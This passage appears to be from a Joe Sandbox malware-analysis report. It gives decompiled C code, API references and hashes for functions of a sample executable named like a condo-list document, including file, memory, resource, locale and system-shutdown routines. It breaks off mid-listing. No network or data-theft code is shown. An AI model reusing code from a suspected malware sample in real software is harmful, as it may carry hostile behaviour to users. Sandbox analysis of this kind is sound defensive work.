				GetFileAttributesW(E004084EC(_v8)); // executed
				_pop(_t21);
				 *[fs:eax] = _t21;
				_push(E00422A65);
				return E00407A20( &_v8);
			}

0x00422a1b
0x00422a22
0x00422a23
0x00422a28
0x00422a2b
0x00422a33
0x00422a41
0x00422a4a
0x00422a4d
0x00422a50
0x00422a5d

APIs

GetFileAttributesW.KERNEL32(00000000,00000000,00422A5E,?,?,00000000,?,00422A71,00422DE2,00000000,00422E27,?,?,00000000,00000000), ref: 00422A41

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8cd9a521966ca01502d57987e2d96a70fbf8ec2bcb71e07358b87aea606a80f7
Instruction ID: ce0c41168f735205187e46b6c3e9294348714fcf51f30dd0002a5427be662740
Opcode Fuzzy Hash: 8cd9a521966ca01502d57987e2d96a70fbf8ec2bcb71e07358b87aea606a80f7
Instruction Fuzzy Hash: D7E09231704308BBD721EB76DE9291AB7ECD788700BA14876B500E7682E6B86E108418

Uniqueness

Uniqueness Score: -1.00%

Function 00423DA8, Relevance: 1.5, APIs: 1, Instructions: 26
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00423DA8(signed int __ecx, void* __edx, signed char _a4, signed char _a8) {
				void* _t17;

				_t17 = CreateFileW(E004084EC(__edx),  *(0x4b92e0 + (_a8 & 0x000000ff) * 4),  *(0x4b92ec + (_a4 & 0x000000ff) * 4), 0,  *(0x4b92fc + (__ecx & 0x000000ff) * 4), 0x80, 0); // executed
				return _t17;
			}

0x00423de5
0x00423ded

APIs

CreateFileW.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00423DE5

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: dd9159e21b70a0e7bcb8d3c3b5b03a1c2ffc365921e6ade8a7c7864e99aae5ed
Instruction ID: 37fe8146f2431012b4276926014d9d5fd10bf57e8855788e2bc853c5fce69268
Opcode Fuzzy Hash: dd9159e21b70a0e7bcb8d3c3b5b03a1c2ffc365921e6ade8a7c7864e99aae5ed
Instruction Fuzzy Hash: 81E048716441283FD6149ADE7C91F76779C9709754F404563F684D7281C4A59D1086FC

Uniqueness

Uniqueness Score: -1.00%

Function 00409FA8, Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409FA8(void* __eax) {
				short _v532;
				void* __ebx;
				void* __esi;
				intOrPtr _t14;
				void* _t16;
				void* _t18;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t16 = __eax;
				_t22 =  *((intOrPtr*)(__eax + 0x10));
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					GetModuleFileNameW( *(__eax + 4),  &_v532, 0x20a);
					_t14 = E0040B234(_t21, _t16, _t18, _t19, _t22); // executed
					_t20 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t20;
					if(_t20 == 0) {
						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
					}
				}
				return  *((intOrPtr*)(_t16 + 0x10));
			}

0x00409fb0
0x00409fb2
0x00409fb6
0x00409fc6
0x00409fcf
0x00409fd4
0x00409fd6
0x00409fdb
0x00409fe0
0x00409fe0
0x00409fdb
0x00409fee

APIs

GetModuleFileNameW.KERNEL32(?,?,0000020A), ref: 00409FC6

Part of subcall function 0040B234: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B270
Part of subcall function 0040B234: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B2C1

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: FileModuleName$LibraryLoad
String ID:
API String ID: 4113206344-0
Opcode ID: 2301add7ea149dd4fbebfdf59b7b3942b6e3d1df22e9777a155c308e994de31e
Instruction ID: 1beb63cefa55d3dba2b36e2095187d50c135a0cf4330adb642bee8d6847d8901
Opcode Fuzzy Hash: 2301add7ea149dd4fbebfdf59b7b3942b6e3d1df22e9777a155c308e994de31e
Instruction Fuzzy Hash: 7BE0C971A013119BCB10DE58C8C5A4A3798AB08754F044AA6AD24DF387D3B5DD1487D5

Uniqueness

Uniqueness Score: -1.00%

Function 00423ED8, Relevance: 1.5, APIs: 1, Instructions: 11
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00423ED8(intOrPtr* __eax) {
				int _t4;
				intOrPtr* _t7;

				_t7 = __eax;
				_t4 = SetEndOfFile( *(__eax + 4)); // executed
				if(_t4 == 0) {
					return E00423CAC( *_t7);
				}
				return _t4;
			}

0x00423ed9
0x00423edf
0x00423ee6
0x00000000
0x00423eea
0x00423ef0

APIs

SetEndOfFile.KERNEL32(?,7FB50010,004B6358,00000000), ref: 00423EDF

Part of subcall function 00423CAC: GetLastError.KERNEL32(004237FC,00423D4F,?,?,00000000,?,004B5F76,00000001,00000000,00000002,00000000,004B659E,?,00000000,004B65E2), ref: 00423CAF

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: ErrorFileLast
String ID:
API String ID: 734332943-0
Opcode ID: 09339d9670a81d77462708df034512c3e9d7a5ee9c38b49a5b5d33688a33920b
Instruction ID: ae15968ab9cd064c61534cde2c099b4aac4a7b80231ae1acb8e6de6fcc6ca8bf
Opcode Fuzzy Hash: 09339d9670a81d77462708df034512c3e9d7a5ee9c38b49a5b5d33688a33920b
Instruction Fuzzy Hash: 58C04C61300210478B04EEBBD5C190666E85B582157414466B904DB216E67DD9158615

Uniqueness

Uniqueness Score: -1.00%

Function 0040CAA4, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040CAA4() {
				intOrPtr _v16;
				struct _SYSTEM_INFO* _t3;

				GetSystemInfo(_t3); // executed
				return _v16;
			}

0x0040caa8
0x0040cab4

APIs

GetSystemInfo.KERNEL32 ref: 0040CAA8

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 9dd1f6b5bb1b0da35443b21aa4a452d0333aba70165927044b368234b0936b7a
Instruction ID: 4f21eec972071caf62eebbeb90550a79e4d7a8082c8b53f17589c9beddeb5e45
Opcode Fuzzy Hash: 9dd1f6b5bb1b0da35443b21aa4a452d0333aba70165927044b368234b0936b7a
Instruction Fuzzy Hash: CDA012984088002AC404AB194C4340F39C819C1114FC40224745CB62C2E61D866403DB

Uniqueness

Uniqueness Score: -1.00%

Function 00403BCC, Relevance: 1.3, APIs: 1, Instructions: 41
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403BCC(signed int __eax) {
				void* _t4;
				intOrPtr _t7;
				signed int _t8;
				void** _t10;
				void* _t12;
				void* _t14;

				_t8 = __eax;
				E00403B60(__eax);
				_t4 = VirtualAlloc(0, 0x13fff0, 0x1000, 4); // executed
				if(_t4 == 0) {
					 *0x4bbaf0 = 0;
					return 0;
				} else {
					_t10 =  *0x4bbadc; // 0x4bbad8
					_t14 = _t4;
					 *_t14 = 0x4bbad8;
					 *0x4bbadc = _t4;
					 *(_t14 + 4) = _t10;
					 *_t10 = _t4;
					_t12 = _t14 + 0x13fff0;
					 *((intOrPtr*)(_t12 - 4)) = 2;
					 *0x4bbaf0 = 0x13ffe0 - _t8;
					_t7 = _t12 - _t8;
					 *0x4bbaec = _t7;
					 *(_t7 - 4) = _t8 | 0x00000002;
					return _t7;
				}
			}

0x00403bce
0x00403bd0
0x00403be3
0x00403bea
0x00403c3c
0x00403c45
0x00403bec
0x00403bec
0x00403bf2
0x00403bf4
0x00403bfa
0x00403bff
0x00403c02
0x00403c06
0x00403c11
0x00403c1e
0x00403c26
0x00403c28
0x00403c35
0x00403c39
0x00403c39

APIs

VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,000001A3,004041E3,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000), ref: 00403BE3

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: cb8f292e3956ad7a1a5e0c92f19b435d8be5366ce3ed5ca5418bf36ecf0e0e1a
Instruction ID: ee114c9f451a66722181258b66a673b4223530c98f306d9f720d31c7abdd50f3
Opcode Fuzzy Hash: cb8f292e3956ad7a1a5e0c92f19b435d8be5366ce3ed5ca5418bf36ecf0e0e1a
Instruction Fuzzy Hash: 71F087F2F002404FE7249F799D40742BAE8E709315B10827EE908EB799E7F488018B88

Uniqueness

Uniqueness Score: -1.00%

Function 00403CF6, Relevance: 1.3, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00403CF6(void* __eax) {
				struct _MEMORY_BASIC_INFORMATION _v44;
				void* _v48;
				void* _t13;
				int _t20;
				void* _t22;
				signed int _t26;
				signed int _t29;
				signed int _t30;
				void* _t34;
				intOrPtr _t35;
				signed int _t39;
				void* _t41;
				void* _t42;

				_push(_t29);
				_t42 = _t41 + 0xffffffdc;
				_t34 = __eax - 0x10;
				E00403C48();
				_t13 = _t34;
				 *_t42 =  *_t13;
				_v48 =  *((intOrPtr*)(_t13 + 4));
				_t26 =  *(_t13 + 0xc);
				if((_t26 & 0x00000008) != 0) {
					_t22 = _t34;
					_t39 = _t26 & 0xfffffff0;
					_t30 = 0;
					while(1) {
						VirtualQuery(_t22,  &_v44, 0x1c);
						if(VirtualFree(_t22, 0, 0x8000) == 0) {
							break;
						}
						_t35 = _v44.RegionSize;
						if(_t39 > _t35) {
							_t39 = _t39 - _t35;
							_t22 = _t22 + _t35;
							continue;
						}
						goto L10;
					}
					_t30 = _t30 | 0xffffffff;
				} else {
					_t20 = VirtualFree(_t34, 0, 0x8000); // executed
					if(_t20 == 0) {
						_t30 = _t29 | 0xffffffff;
					} else {
						_t30 = 0;
					}
				}
				L10:
				if(_t30 == 0) {
					 *_v48 =  *_t42;
					 *( *_t42 + 4) = _v48;
				}
				 *0x4bdb78 = 0;
				return _t30;
			}

0x00403cfa
0x00403cfc
0x00403d01
0x00403d04
0x00403d09
0x00403d0d
0x00403d13
0x00403d17
0x00403d1d
0x00403d39
0x00403d3d
0x00403d40
0x00403d42
0x00403d4a
0x00403d5e
0x00000000
0x00000000
0x00403d65
0x00403d6b
0x00403d6d
0x00403d6f
0x00000000
0x00403d6f
0x00000000
0x00403d6b
0x00403d60
0x00403d1f
0x00403d27
0x00403d2e
0x00403d34
0x00403d30
0x00403d30
0x00403d30
0x00403d2e
0x00403d73
0x00403d75
0x00403d7e
0x00403d87
0x00403d87
0x00403d8a
0x00403d9a

APIs

VirtualFree.KERNEL32(?,00000000,00008000), ref: 00403D27
VirtualQuery.KERNEL32(?,?,0000001C), ref: 00403D4A
VirtualFree.KERNEL32(?,00000000,00008000,?,?,0000001C), ref: 00403D57

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: Virtual$Free$Query
String ID:
API String ID: 778034434-0
Opcode ID: 70118730a538275f8eba95c50282fe5a7e92951222106072b386c800723d93a4
Instruction ID: 6789628300bf7aa479fe1b8b627d7daf3441881ad106b622f2e79b23e4dc796b
Opcode Fuzzy Hash: 70118730a538275f8eba95c50282fe5a7e92951222106072b386c800723d93a4
Instruction Fuzzy Hash: C5F06D353046005FD311DF1AC844B17BBE9EFC5711F15C67AE888973A1E635DD018796

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040A928, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 140
stringlibraryfileCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040A928(short* __eax, intOrPtr __edx) {
				short* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v20;
				struct _WIN32_FIND_DATAW _v612;
				short _v1134;
				signed int _t50;
				signed int _t51;
				void* _t55;
				signed int _t88;
				signed int _t89;
				intOrPtr* _t90;
				signed int _t101;
				signed int _t102;
				short* _t112;
				struct HINSTANCE__* _t113;
				short* _t115;
				short* _t116;
				void* _t117;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t113 = GetModuleHandleW(L"kernel32.dll");
				if(_t113 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t115 = _v8 + 4;
						goto L10;
					} else {
						if( *((short*)(_v8 + 2)) == 0x5c) {
							_t116 = E0040A904(_v8 + 4);
							if( *_t116 != 0) {
								_t14 = _t116 + 2; // 0x2
								_t115 = E0040A904(_t14);
								if( *_t115 != 0) {
									L10:
									_t88 = _t115 - _v8;
									_t89 = _t88 >> 1;
									if(_t88 < 0) {
										asm("adc ebx, 0x0");
									}
									_t43 = _t89 + 1;
									if(_t89 + 1 <= 0x105) {
										E0040A34C( &_v1134, _v8, _t43);
										while( *_t115 != 0) {
											_t112 = E0040A904(_t115 + 2);
											_t50 = _t112 - _t115;
											_t51 = _t50 >> 1;
											if(_t50 < 0) {
												asm("adc eax, 0x0");
											}
											if(_t51 + _t89 + 1 <= 0x105) {
												_t55 =  &_v1134 + _t89 + _t89;
												_t101 = _t112 - _t115;
												_t102 = _t101 >> 1;
												if(_t101 < 0) {
													asm("adc edx, 0x0");
												}
												E0040A34C(_t55, _t115, _t102 + 1);
												_v20 = FindFirstFileW( &_v1134,  &_v612);
												if(_v20 != 0xffffffff) {
													FindClose(_v20);
													if(lstrlenW( &(_v612.cFileName)) + _t89 + 1 + 1 <= 0x105) {
														 *((short*)(_t117 + _t89 * 2 - 0x46a)) = 0x5c;
														E0040A34C( &_v1134 + _t89 + _t89 + 2,  &(_v612.cFileName), 0x105 - _t89 - 1);
														_t89 = _t89 + lstrlenW( &(_v612.cFileName)) + 1;
														_t115 = _t112;
														continue;
													}
												}
											}
											goto L24;
										}
										E0040A34C(_v8,  &_v1134, _v12);
									}
								}
							}
						}
					}
				} else {
					_t90 = GetProcAddress(_t113, "GetLongPathNameW");
					if(_t90 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v1134);
						_push(_v8);
						if( *_t90() == 0) {
							goto L4;
						} else {
							E0040A34C(_v8,  &_v1134, _v12);
						}
					}
				}
				L24:
				return _v16;
			}

0x0040a934
0x0040a937
0x0040a93d
0x0040a94a
0x0040a94e
0x0040a98d
0x0040a994
0x0040a9d4
0x00000000
0x0040a996
0x0040a99e
0x0040a9af
0x0040a9b5
0x0040a9bb
0x0040a9c3
0x0040a9c9
0x0040a9d7
0x0040a9d9
0x0040a9dc
0x0040a9de
0x0040a9e0
0x0040a9e0
0x0040a9e3
0x0040a9eb
0x0040a9fc
0x0040aac3
0x0040aa0e
0x0040aa12
0x0040aa14
0x0040aa16
0x0040aa18
0x0040aa18
0x0040aa23
0x0040aa33
0x0040aa37
0x0040aa39
0x0040aa3b
0x0040aa3d
0x0040aa3d
0x0040aa43
0x0040aa5b
0x0040aa62
0x0040aa68
0x0040aa84
0x0040aa86
0x0040aaad
0x0040aabf
0x0040aac1
0x00000000
0x0040aac1
0x0040aa84
0x0040aa62
0x00000000
0x0040aa23
0x0040aad9
0x0040aad9
0x0040a9eb
0x0040a9c9
0x0040a9b5
0x0040a99e
0x0040a950
0x0040a95b
0x0040a95f
0x00000000
0x0040a961
0x0040a961
0x0040a96c
0x0040a970
0x0040a975
0x00000000
0x0040a977
0x0040a983
0x0040a983
0x0040a975
0x0040a95f
0x0040aade
0x0040aae7

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,004162BC,?,?), ref: 0040A945
GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040A956
FindFirstFileW.KERNEL32(?,?,kernel32.dll,004162BC,?,?), ref: 0040AA56
FindClose.KERNEL32(?,?,?,kernel32.dll,004162BC,?,?), ref: 0040AA68
lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,004162BC,?,?), ref: 0040AA74
lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,004162BC,?,?), ref: 0040AAB9

Strings

\, xrefs: 0040AA86
GetLongPathNameW, xrefs: 0040A950
kernel32.dll, xrefs: 0040A940

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameW$\$kernel32.dll
API String ID: 1930782624-3908791685
Opcode ID: 2e7747c66ca0daf9bf73dcf24122f514d4f35ae2d915a4be054088bbf24f0c4d
Instruction ID: 0568a8f2c4c85ac628058e700237ad117df8c3680498263a44950cac296231c5
Opcode Fuzzy Hash: 2e7747c66ca0daf9bf73dcf24122f514d4f35ae2d915a4be054088bbf24f0c4d
Instruction Fuzzy Hash: 7841A071B003189BCB20DE98CD85A9EB3B5AB44310F1485B69945F72C1EB7CAE51CF4A

Uniqueness

Uniqueness Score: -1.00%

Function 004AF110, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 42
shutdownCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E004AF110() {
				int _v4;
				struct _TOKEN_PRIVILEGES _v16;
				void* _v20;
				int _t7;

				if(E0041FF2C() != 2) {
					L5:
					_t7 = ExitWindowsEx(2, 0);
					asm("sbb eax, eax");
					return _t7 + 1;
				}
				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v20) != 0) {
					LookupPrivilegeValueW(0, L"SeShutdownPrivilege",  &(_v16.Privileges));
					_v16.PrivilegeCount = 1;
					_v4 = 2;
					AdjustTokenPrivileges(_v20, 0,  &_v16, 0, 0, 0);
					if(GetLastError() == 0) {
						goto L5;
					}
					return 0;
				}
				return 0;
			}

0x004af11b
0x004af178
0x004af17c
0x004af184
0x00000000
0x004af186
0x004af12d
0x004af13f
0x004af144
0x004af14c
0x004af166
0x004af172
0x00000000
0x00000000
0x00000000
0x004af174
0x00000000

APIs

GetCurrentProcess.KERNEL32(00000028), ref: 004AF120
OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004AF126
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 004AF13F
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 004AF166
GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004AF16B
ExitWindowsEx.USER32(00000002,00000000), ref: 004AF17C

Strings

SeShutdownPrivilege, xrefs: 004AF138

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
String ID: SeShutdownPrivilege
API String ID: 107509674-3733053543
Opcode ID: dbd0b99069aff0d6788c9efc2bbd2c2bb6d4dae2a155ecb9c3cc528dabbfbf9f
Instruction ID: 15d82be9bc359c8987119149698676c325083c88dcd196a4f2f9cd1a299335ef
Opcode Fuzzy Hash: dbd0b99069aff0d6788c9efc2bbd2c2bb6d4dae2a155ecb9c3cc528dabbfbf9f
Instruction Fuzzy Hash: 75F06D70684301B5E610A6F2CD07F6B21C89B56B58FA00D3EBA84E91C2D7BDD81D42BF

Uniqueness

Uniqueness Score: -1.00%

Function 004AF9F0, Relevance: 6.0, APIs: 4, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004AF9F0() {
				struct HRSRC__* _t10;
				void* _t11;
				void* _t12;

				_t10 = FindResourceW(0, 0x2b67, 0xa);
				if(_t10 == 0) {
					E004AF834();
				}
				if(SizeofResource(0, _t10) != 0x2c) {
					E004AF834();
				}
				_t11 = LoadResource(0, _t10);
				if(_t11 == 0) {
					E004AF834();
				}
				_t12 = LockResource(_t11);
				if(_t12 == 0) {
					E004AF834();
				}
				return _t12;
			}

0x004af9ff
0x004afa03
0x004afa05
0x004afa05
0x004afa15
0x004afa17
0x004afa17
0x004afa24
0x004afa28
0x004afa2a
0x004afa2a
0x004afa35
0x004afa39
0x004afa3b
0x004afa3b
0x004afa43

APIs

FindResourceW.KERNEL32(00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002,00000000,004B659E,?,00000000,004B65E2), ref: 004AF9FA
SizeofResource.KERNEL32(00000000,00000000,00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002,00000000,004B659E), ref: 004AFA0D
LoadResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002,00000000), ref: 004AFA1F
LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002), ref: 004AFA30

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 128b44542abe6d6e0e09835f67cf23f4a4e4be27e5836866f54195567a651b81
Instruction ID: 8c15b2061d88d30e204a2d131290402b8da5209396f43898e5d703764eea749b
Opcode Fuzzy Hash: 128b44542abe6d6e0e09835f67cf23f4a4e4be27e5836866f54195567a651b81
Instruction Fuzzy Hash: FCE07E8074634625FA6436F718D7BAE00084B36B4DF40593FFA08A92D2EEAC8C19522E

Uniqueness

Uniqueness Score: -1.00%

Function 0040A4CC, Relevance: 4.6, APIs: 3, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0040A4CC(signed short __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				short _v182;
				short _v352;
				char _v356;
				char _v360;
				char _v364;
				int _t58;
				signed int _t61;
				intOrPtr _t70;
				signed short _t80;
				void* _t83;
				void* _t85;
				void* _t86;

				_t77 = __edi;
				_push(__edi);
				_v356 = 0;
				_v360 = 0;
				_v364 = 0;
				_v8 = __edx;
				_t80 = __eax;
				_push(_t83);
				_push(0x40a631);
				_push( *[fs:eax]);
				 *[fs:eax] = _t83 + 0xfffffe98;
				E00407A20(_v8);
				_t85 = _t80 -  *0x4b7a08; // 0x404
				if(_t85 >= 0) {
					_t86 = _t80 -  *0x4b7c08; // 0x7c68
					if(_t86 <= 0) {
						_t77 = 0x40;
						_v12 = 0;
						if(0x40 >= _v12) {
							do {
								_t61 = _t77 + _v12 >> 1;
								if(_t80 >=  *((intOrPtr*)(0x4b7a08 + _t61 * 8))) {
									__eflags = _t80 -  *((intOrPtr*)(0x4b7a08 + _t61 * 8));
									if(__eflags <= 0) {
										E0040A3EC( *((intOrPtr*)(0x4b7a0c + _t61 * 8)), _t61, _v8, _t77, _t80, __eflags);
									} else {
										_v12 = _t61 + 1;
										goto L8;
									}
								} else {
									_t77 = _t61 - 1;
									goto L8;
								}
								goto L9;
								L8:
							} while (_t77 >= _v12);
						}
					}
				}
				L9:
				if( *_v8 == 0 && IsValidLocale(_t80 & 0x0000ffff, 2) != 0) {
					_t58 = _t80 & 0x0000ffff;
					GetLocaleInfoW(_t58, 0x59,  &_v182, 0x55);
					GetLocaleInfoW(_t58, 0x5a,  &_v352, 0x55);
					E0040858C( &_v356, 0x55,  &_v182);
					_push(_v356);
					_push(0x40a64c);
					E0040858C( &_v360, 0x55,  &_v352);
					_push(_v360);
					_push(E0040A65C);
					E0040858C( &_v364, 0x55,  &_v182);
					_push(_v364);
					E004087C4(_v8, _t58, 5, _t77, _t80);
				}
				_pop(_t70);
				 *[fs:eax] = _t70;
				_push(E0040A638);
				return E00407A80( &_v364, 3);
			}

0x0040a4cc
0x0040a4d7
0x0040a4da
0x0040a4e0
0x0040a4e6
0x0040a4ec
0x0040a4ef
0x0040a4f3
0x0040a4f4
0x0040a4f9
0x0040a4fc
0x0040a502
0x0040a507
0x0040a50e
0x0040a510
0x0040a517
0x0040a519
0x0040a520
0x0040a526
